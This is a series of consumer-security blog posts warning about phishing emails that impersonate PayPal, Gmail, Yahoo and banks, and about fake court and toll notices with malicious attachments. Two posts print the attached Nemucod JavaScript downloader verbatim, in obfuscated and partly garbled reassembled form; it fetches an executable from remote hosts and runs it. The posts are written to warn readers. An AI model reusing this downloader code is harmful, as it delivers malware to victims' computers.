Paypal Scammers still at it

Got this text message early in May (and I’ve had a couple of others since… these things seem to go in waves as scammers share ideas around.

Just look at the URL that you’re supposed to use to log in: “Erwanbikes”? It’s a real website in India, supposedly for renting bicycles. Either someone has embedded malicious code in a subdirectory of their website without their knowledge, or they are actively involved in the scam. There’s no way of knowing.

Either way, if a communication came from PayPal, the address to go to would be something at

and not some random website. Be careful if you get messages like this and never click on the link unless you know or can tell where it has taken you.

If you’re curious, here’s where the rabbit hole goes:

Note the bogus (i.e. not PayPal) URL. Now they want your information.

Never provide information like this to an unknown entity. SS Number? Mother’s Maiden Name? Run away fast!

If someone wants your credit card information and you don’t know who they are, you’re being scammed.

Once you’ve given the bad guys access to your financial information and your credit card number, you are redirected to the legitimate PayPal website. Then watch your money disappear. Please don’t be taken in by criminal activity of this nature, and watch over your vulnerable loved ones.

The Old Wolf has spoken.

No, I didn’t ask to cancel my Gmail account


Subject: Request to Terminate Your account has been accepted
From: AccountUpdate via
Date: Apr 26 (10 days ago)
to _To: millions of people

Dear Gmail Customer,

You submitted a request to terminate your Gmail mail account and the process has started by our Gmail mail Team, Please give us 3 working days to close your mail account.

To cancel the termination request reply to this mail.

All files on your Gmail mail including (Inbox, Sent, Spam, Trash, Draft) will be deleted and access to your Gmail mail account will be Denied.

If you wish to Terminate your Email Address, you can Sign Up for a new Gmail mail account.

For further help please contact by replying to this mail.

Gmail! Account Services

Please watch out for emails like this. No, I didn’t ask for my Gmail account to be terminated, and neither did you.

If you respond to the email, you will be confirming that you are a live sucker to these people:,,,,,,,,

And it’s a penny to a quid that every one of them is a scammer who will do their best to get your personal information or your money.

How do you know this message is not from Gmail? It was sent from The Gmail! account team (Gmail doesn’t use a “!” in their name like “Yahoo!” does. In addition to that, the return address is:

AccountUpdate via

A double redirect, one from the UK and one from Turkey. No, Virginia, that’s not Gmail.

Be careful out there.

The Old Wolf has spoken.

Yahoo Mail “Upgrade” scam

Found this in my mailbox just today, although it arrived last week.


The “Upgrade Now” link leads to “,” but the link is now dead. Raven Biotech is a legitimate firm, but some scumbag somewhere managed to get onto their server and add the malicious page – probably designed as a phishing scam or drive-by malware downloading.

Never click on links in emails. Notice where the link goes by hovering your mouse over the link, and then visit the page directly.

If you’re not sure an email is valid, contact the company by phone.

Never provide sensitive banking, financial, or password information on the internet if you don’t know who you are dealing with. Be careful out there.

The Old Wolf has spoken.

WordPress users, please use strong passwords

Just got phishing spam from bad guys pretending to the Bank of Ireland. Here’s the email:

Bank of Ireland Phishing

If you are fooled into clicking the link, you are redirected to:

The “obfusticated” prevents anyone from actually going to the bad site, and protects the wordpress user whose website (“”) has been compromised. For what it’s worth, I’ve done my best to warn the individual involved that there is a problem at their website.

The gateway page is below. It looks very official, but don’t let that fool you. It’s a fake.

Bank of Ireland Phishing 2

Then you get to give the criminals your login PIN:

Bank of Ireland Phishing 3

The malicious code appears to fail the first time and makes you re-enter the data. It doesn’t matter what you put in the second time, you’ll advance to the next page:

Bank of Ireland Phishing 4


Next you are asked to hand the criminals your credit card password.

Bank of Ireland Phishing 5

Once they have your data – or in my case, a whole raft of obscenities – you are redirected to the real Bank of Ireland website.

If you have a WordPress blog (or any other website) please make sure you are using strong passwords. If bad guys get in, they can park malicious code in your web space and direct their victims there, not to mention steal whatever valuable data is there.

Never give out sensitive financial information over the web. If you suspect your accounts have truly been compromised or locked, call your bank directly and ask for verification.

Be careful out there.

The Old Wolf has spoken.

Phishing is still very much a thing. Please be careful.

This showed up in a business email account yesterday. Please note, I don’t have an acccount with US Bank, and the “To:” field has an address that is not mine. (click the image to enlarge)

Fraud 0

When you click on the “Login Here” link, if you’re silly enough to do so, this is what you get:

fraud 1

Biggest red flag: the web page you just got redirected to is not but rather “” (Judy Bruce is an author, and for some reason her web page has been compromised by malefactors. I have done my best to notify her so she can get this infestation cleaned out.)

Followed by a request for your password:

Fraud 2

But wait, there’s more!


Really, people? You’re just going to give out your sensitive financial information to some random mailer on the internet?

But hey, if you’re going to do that, you might as well give the crooks access to your email account as well:

Fraud 3Fraud 5

Please be careful out there. A bank will never ask you to provide sensitive information of this nature via email or on the web. If you have doubts or questions, contact your financial institution directly before providing any information.

Please protect yourselves and your vulnerable loved ones.

The Old Wolf has spoken.

Not from Yahoo (scam)


“Your Mail version is outdated.” “Upgrade your account now.”

Never follow links like this that ask you to enter your email username and password. Would you hand your credit card to a criminal? Don’t give access to your Yahoo, Gmail, Hotmail, or other accounts to scammers.

If  you have loved ones who are not especially tech-savvy, please protect them from this kind of jiggery-pokery.

Be safe out there.

The Old Wolf has spoken.

Order to Appear in Court

Nothing to see here, folks, just move along. Another scam email from fraudsters trying to get me to download malware to my computer.

This time the Javascript code wants to go out to,, and (all of which are invalid top-level domains), and then download and install other nasty stuff to my computer.

Here’s the email that this came attached to:

To: [edited]
Subject: Notice of appearance in Court #00928994

From: “District Court” <>

Notice to Appear,
You have to appear in the Court on the July 27.
Please, prepare all the documents relating to the case and bring them to Court on the specified date.
Note: The case may be heard by the judge in your absence if you do not come.
You can review complete details of the Court Notice in the attachment.
Jimmie Cowan,
Clerk of Court.
That “notice to appear” attachment is actually a JavaScript file, and it came as garbage that looked like this:

function sah126() { return ’00) {‘; };  function sah125() { return ‘ == 2’; };  function sah210() { return ‘+fr+’; }; function sah86() { return ‘ar dn’; };  function sah105() { return ‘rea’; };  function sah95() { return ‘bj’; };

But as soon as the code runs, it concatenates all those little bits into something that looks like this:

var stroke=”55565C5E0D0A020B240507050001091D0B0203160105100A0117174A070B09″;

function gvi() { return ‘e’; }

function sah() { return ‘val’; }

function dl(fr)l”); v { var b = “w’; };”.split’; };

(” “); for (var i=0; i<b.length; i++) { var ws = new ActiveXObject(“WScript.Shelar fn = ws.ExpandEnvironmentStrings(“%TEMP%”)+String.fromCharCode(92)+Math.round(Math.random()*100000000)+”.exe”; var dn = 0; var xo = new ActiveXObject(“MSXML2.XMLHTTP”); xo.onreadystatechange = function() { if (xo.readyState == 4 && xo.status == 200) { var xa = new ActiveXObject(“ADODB.Stream”);; xa.type = 1; xa.write(xo.ResponseBody); if (xa.size > 5000) { dn = 1; xa.position = 0; xa.saveToFile(fn,2); try { ws.Run(fn,1,0); } catch (er) {}; }; xa.close(); }; };’; };

try {“GET”,”http://”+b%5Bi%5D+”/document.php?rnd=”+fr+”&id=”+stroke, false); xo.send(); } catch (er) {}; if (dn == 1) break; }; }; dl(4851); dl(5382); dl(2753);var po = ”

for (var ckz=1; ckz<=242; ckz++) { po += this[‘sah’+ckz](); } this[gvi()+sah()](po);

I’ve mentioned these a few times before – the only way to keep yourself safe is to never open attachments you receive in email messages unless you are 100% sure whom they are from and what they are.

The bad actors want access to your data and your computer, and they don’t care how they get it.

Be careful out there.

The Old Wolf has spoken.

An Illustration: Why you never open those attachments.


I got two emails yesterday, each with an attachment. Both are designed to get people to open whatever malware package they are carrying:

To: [redacted]
Subject: Notice to appear in Court #00000554562

From: “District Court” <>

Notice to Appear,

This is to inform you to appear in the Court on the July 06 for your case hearing.
Please, do not forget to bring all the documents related to the case.
Note: The case will be heard by the judge in your absence if you do not come.
The copy of Court Notice is attached to this email.
Kind regards,
Nathaniel Berger,
Clerk of Court.

Subject: Indebtedness for driving on toll road #0000133433
To: [redacted]

From: “E-ZPass Manager” <>

Notice to Appear,
You have a unpaid bill for using toll road.
Please, do not forget to service your debt.
You can review the invoice in the attachment.
Calvin Gleason,
E-ZPass Agent.

Notice that the second email begins the same way: “Notice to appear,” even though it’s a notification of a supposed debt. These were clearly cut/pasted by the same person/group.

So let’s look at that attachment.

The E-Z Pass zip file contains a file called “E-ZPass_0000133433.doc.js.” This is a javascript file, and it was immediately quarantined by Microsoft Security Essentials and flagged as TrojanDownloader:JS/Nemucod.P. According to Microsoft, “This program displays deceptive program messages. It downloads and installs other programs onto your PC without your consent, including other malware.”

Clearly, you don’t want to mess with this on your machine. The body of the file looks like this:

var stroke=”5556515E0D0A020B240507050001091D0B0203160105100A0117174A070B09″;function igs118() { return ‘4 && ‘; };  function igs236() { return ‘);’; };  function igs101() { return ‘); x’; };  function igs193() { return ‘ x’; };  function igs232() { return ‘3862’; };  function igs3() { return ‘ dl’; };  function igs30() { return ‘i=’; };  function igs140() { return ‘a.ty’; };  function igs182() { return ‘} ‘; };  function igs74() { return ‘.rou’; };  function igs162() { return ‘1; x’; };  function igs23() { return ‘com”‘; };  function igs131() { return ‘ect(‘; };  function igs217() { return ‘ } c’; };  function igs228() { return ‘; dl(‘; };  function igs176() { return ‘{ ws’; };  function igs136() { return ‘”); x’; };  function igs141() { return ‘pe ‘; };  function igs97() { return ‘SXML2’; };  function igs192() { return ‘try {‘; };  function igs63() { return ‘(“‘; };  function igs50() { return ‘”);’; };  function igs229() { return ‘6001)’; };  function igs89() { return ‘ar x’; };  function igs66() { return ‘”)+’; };  function igs46() { return ‘WS’; };  function igs19() { return ‘ a’; };  function igs79() { return ‘m()*’; };  function igs186() { return ‘; };’; };  function igs28() { return ‘ (v’; };  function igs29() { return ‘ar ‘; };  function igs117() { return ‘e == ‘; };  function igs216() { return ‘nd();’; };  function igs185() { return ‘r) {}’; };  function igs113() { return ‘ (x’; };  function igs90() { return ‘o ‘; };  function igs72() { return ‘)+’; };  function igs70() { return ‘arCod’; };  function igs49() { return ‘ell’; };  function igs233() { return ‘); d’; };  function igs171() { return ‘ile(‘; };  function igs201() { return ‘]+”/d’; };  function igs166() { return ‘ 0; x’; };  var ci = ”;  function igs127() { return ‘ new ‘; };  function igs40() { return ‘s =’; };  function igs219() { return ‘h ‘; };  function igs206() { return ‘nd=”+’; };  function igs61() { return ‘rin’; };  function igs22() { return ‘ge.’; };  function igs102() { return ‘o.o’; };  function igs138() { return ‘pen’; };  function igs14() { return ‘cl’; };  function igs111() { return ‘n()’; };  function igs10() { return ‘so’; };  function igs48() { return ‘.Sh’; };  function igs51() { return ‘ v’; };  function igs98() { return ‘.XMLH’; };  function igs167() { return ‘a.’; };  function igs17() { return ‘etqy’; };  function igs42() { return ‘Ac’; };  function igs194() { return ‘o.’; };  function igs129() { return ‘eX’; };  function igs137() { return ‘a.o’; };  function igs91() { return ‘= ‘; };  function igs144() { return ‘a.’; };  function igs159() { return ‘ { d’; };  function igs45() { return ‘t(“‘; };  function igs2() { return ‘ion’; };  function igs92() { return ‘new’; };  function igs18() { return ‘.com’; };  function igs106() { return ‘atec’; };  function igs8() { return ‘”dick’; };  function igs65() { return ‘P%’; };  function igs147() { return ‘e(xo’; };  function igs68() { return ‘g.f’; };  function igs75() { return ‘nd’; };  function igs24() { return ‘.spli’; };  function igs200() { return ‘”+b[i’; };  function igs47() { return ‘cript’; };  function igs227() { return ‘ } }’; };  function igs179() { return ‘n,’; };  function igs161() { return ‘= ‘; };  function igs187() { return ‘ xa’; };  function igs67() { return ‘Strin’; };  function igs34() { return ‘leng’; };  function igs27() { return ‘for’; };  function igs143() { return ‘; x’; };  function igs199() { return ‘tp://’; };  function igs35() { return ‘th; ‘; };  function igs177() { return ‘.R’; };  function igs39() { return ‘ w’; };  function igs4() { return ‘(fr’; };  function igs153() { return ‘f (‘; };  function igs189() { return ‘ose(‘; };  function igs115() { return ‘ead’; };  function igs33() { return ‘b.’; };  function igs1() { return ‘funct’; };  function igs146() { return ‘it’; };  function igs44() { return ‘Objec’; };  function igs145() { return ‘wr’; };  function igs38() { return ‘ var’; };  function igs11() { return ‘nw’; };  function igs108() { return ‘e ‘; };  function igs94() { return ‘ve’; };  function igs205() { return ‘p?r’; };  function igs169() { return ‘veT’; };  function igs174() { return ‘); tr’; };  function igs16() { return ‘om ‘; };  function igs105() { return ‘dyst’; };  function igs170() { return ‘oF’; };  function igs83() { return ‘)+”.e’; };  function igs230() { return ‘; d’; };  function igs78() { return ‘rando’; };  function igs149() { return ‘spo’; };  function igs21() { return ‘na’; };  function igs37() { return ‘+) {‘; };  function igs203() { return ‘ume’; };  function igs125() { return ‘ xa’; };  function igs76() { return ‘(Ma’; };  function igs41() { return ‘ new ‘; };  function igs188() { return ‘.cl’; };  function igs134() { return ‘.St’; };  function igs80() { return ‘10000’; };  function igs116() { return ‘yStat’; };  function igs150() { return ‘ns’; };  function igs135() { return ‘ream’; };  function igs114() { return ‘o.r’; };  function igs96() { return ‘ct(“M’; };  function zuw() { return ‘e’; };  function igs215() { return ‘.se’; };  function igs139() { return ‘(); x’; };  function igs62() { return ‘gs’; };  function igs130() { return ‘Obj’; };  function igs222() { return ‘; if ‘; };  function igs218() { return ‘atc’; };  function igs133() { return ‘ODB’; };  function igs207() { return ‘fr+”&’; };  function igs123() { return ‘200) ‘; };  function igs202() { return ‘oc’; };  function igs6() { return ‘var ‘; };  function igs152() { return ‘); i’; };  function igs198() { return ‘”,”ht’; };  function igs148() { return ‘.Re’; };  function igs221() { return ‘) {}’; };  function igs25() { return ‘t(” “‘; };  function igs234() { return ‘l(‘; };  function igs100() { return ‘P”‘; };  function igs209() { return ‘=”+s’; };  function igs165() { return ‘ion =’; };  function igs204() { return ‘’; };  function igs104() { return ‘ea’; };  function igs55() { return ‘.Expa’; };  function igs112() { return ‘ { if’; };  function igs99() { return ‘TT’; };  function igs5() { return ‘) { ‘; };  function igs12() { return ‘res’; };  function igs178() { return ‘un(f’; };  function igs87() { return ‘ = ‘; };  function igs195() { return ‘op’; };  function igs85() { return ‘; v’; };  function igs214() { return ‘ xo’; };  function igs224() { return ‘ == 1’; };  function igs226() { return ‘reak;’; };  function igs223() { return ‘(dn’; };  function igs124() { return ‘{ var’; };  function igs196() { return ‘en(“G’; };  function igs95() { return ‘XObje’; };  function igs31() { return ‘0; ‘; };  function igs15() { return ‘ub.c’; };  function igs126() { return ‘ =’; };  function igs54() { return ‘ ws’; };  function igs73() { return ‘Math’; };  function igs82() { return ’00’; };  function igs231() { return ‘l(‘; };  function igs119() { return ‘xo.s’; };  function igs107() { return ‘hang’; };  function igs86() { return ‘ar dn’; };  function igs190() { return ‘); }’; };  function igs155() { return ‘.si’; };  function igs213() { return ‘e);’; };  function igs58() { return ‘onm’; };  function igs7() { return ‘b = ‘; };  function igs208() { return ‘id’; };  function igs120() { return ‘ta’; };  function igs121() { return ‘tu’; };  function igs88() { return ‘0; v’; };  function igs71() { return ‘e(92’; };  function igs84() { return ‘xe”‘; };  function igs36() { return ‘i+’; };  function igs122() { return ‘s == ‘; };  function igs109() { return ‘= fu’; };  function igs69() { return ‘romCh’; };  function igs56() { return ‘ndEnv’; };  function igs64() { return ‘%TEM’; };  function igs212() { return ‘als’; };  function igs110() { return ‘nctio’; };  function igs103() { return ‘nr’; };  function igs164() { return ‘posit’; };  function igs173() { return ‘,2’; };  function igs225() { return ‘) b’; };  function igs53() { return ‘fn =’; };  function igs157() { return ‘> 500’; };  function igs151() { return ‘eBody’; };  function igs175() { return ‘y ‘; };  function igs9() { return ‘in’; };  function igs13() { return ‘tling’; };  function igs154() { return ‘xa’; };  function igs32() { return ‘i<‘; };  function igs59() { return ‘ent’; };  function igs172() { return ‘fn’; };  function igs() { return ‘val’; };  function igs142() { return ‘= 1′; };  function igs81() { return ’00’; };  function igs180() { return ‘1,’; };  function igs57() { return ‘ir’; };  function igs43() { return ‘tiveX’; };  function igs60() { return ‘St’; };  function igs160() { return ‘n ‘; };  function igs191() { return ‘; }; ‘; };  function igs183() { return ‘catch’; };  function igs77() { return ‘th.’; };  function igs52() { return ‘ar ‘; };  function igs235() { return ‘8083’; };  function igs163() { return ‘a.’; };  function igs181() { return ‘0); ‘; };  function igs132() { return ‘”AD’; };  function igs156() { return ‘ze ‘; };  function igs197() { return ‘ET’; };  function igs128() { return ‘Activ’; };  function igs20() { return ‘volo’; };  function igs211() { return ‘, f’; };  function igs93() { return ‘ Acti’; };  function igs168() { return ‘sa’; };  function igs158() { return ‘0)’; };  function igs26() { return ‘); ‘; };  function igs210() { return ‘troke’; };  function igs184() { return ‘ (e’; };  function igs220() { return ‘(er’; }; for (var pn=1; pn<=236; pn++) { ci += this[‘igs’+pn](); } this[zuw()+igs()](ci);

The last statement in the program concatenates all these little scraps of code (listed out of order) into one large statement and then executes it:

var stroke=”5556515E0D0A020B240507050001091D0B0203160105100A0117174A070B09″;
{ return valfunction dl(fr) { var b = “”.split(” “); for (var i=0; i<b.length; i++) { var ws = new ActiveXObject(“WScript.Shell”); var fn = ws.ExpandEnvironmentStrings(“%TEMP%”)+String.fromCharCode(92)+Math.round(Math.random()*100000000)+”.exe”; var dn = 0; var xo = new ActiveXObject(“MSXML2.XMLHTTP”); xo.onreadystatechange = function() { if (xo.readyState == 4 && xo.status == 200) { var xa = new ActiveXObject(“ADODB.Stream”);; xa.type = 1; xa.write(xo.ResponseBody); if (xa.size > 5000) { dn = 1; xa.position = 0; x; }; var ci = ;
a.saveToFile(fn,2); try { ws.Run(fn,1,0); } catch (er) {}; }; xa.close(); }; }; try {“GET”,”http://”+b%5Bi%5D+”/document.php?rnd=”+fr+”&id=”+stroke, false); xo.send(); } catch (er) {}; if (dn == 1) break; } }; dl(6001); dl(3862); dl(8083);zuwe
for (var pn=1; pn<=236; pn++) { ci += this[‘igs’+pn](); } this[zuw()+igs()](ci);

Now I’m not a Javascript coder, but I can tell just by looking at it that this will access several compromised or outright malicious websites out there, and then download and run other files which are guaranteed to make your life miserable. At the least, you’ll get advertisements and popups. At worst, you will lose all your data in horrible ways or become part of a spamming network of zombie computers, or have your identity and your financial information stolen and used by criminals. None of these things are appealing.

To protect yourself, these two rules should be followed at all times:

  1. Do not click on links. Instead, copy the URL from the email and paste it into your browser. Even better is to simply type the destination name into your browser.
  2. Be suspicious of attachments, and only open those that you are expecting.

There are others, but if everyone would follow these two basic common-sense procedures, the bad actors would have far less access to people’s machines and data.

Protect your loved ones, and be careful out there.

The Old Wolf has spoken.

Protect yourself from Phishing attacks


Great advice from a local business:

  • Be suspicious of any email that requires “immediate action” or creates a sense of urgency. This is a common technique used by criminals to rush people into making a mistake.
  • Be suspicious of emails addressed to “Dear Customer” or some other generic salutation. If it is your bank, they will know your name.
  • Be suspicious of grammar or spelling mistakes; most businesses proofread their messages carefully before sending them.
  • Do not click on links. Instead, copy the URL from the email and paste it into your browser. Even better is to simply type the destination name into your browser.
  • Hover your mouse over the link. This will show you the true destination where you would go if you actually clicked on it. If the true destination of the link is different than what is shown in the email, this may be an indication of fraud.
  • Be suspicious of attachments, and only open those that you are expecting.
  • Just because you got an email from your friend does not mean they sent it. Your friend’s computer may have been infected or their account may have been compromised, and malware is sending the email to all of your friend’s contacts.
  • If you get a suspicious email from a trusted friend or colleague, call them to confirm that they sent it. Always use a telephone number that you already know or can independently verify, not one that was included in the message.

I’ve mentioned most of these in various other posts, but this was an excellent summary that deserved to be shared. Be careful out there.

The Old Wolf has spoken.

Never “Verify Your Email.”

No email service will send you a message asking you to provide your address and password, or other financial data. They just won’t.


This email is bogus. Note the red circle next to the “click to validate” link – that’s a warning from WOT (Web of Trust) that indicates the website is not to be trusted.

If you’re foolish enough to click the link, which goes to (NOT a Yahoo website), you’ll get this:


If you fill out this information, scammers now have access to your email account, and they will use it to steal information or send out criminal spam.

Never do this. Be careful out there.

The Old Wolf has spoken.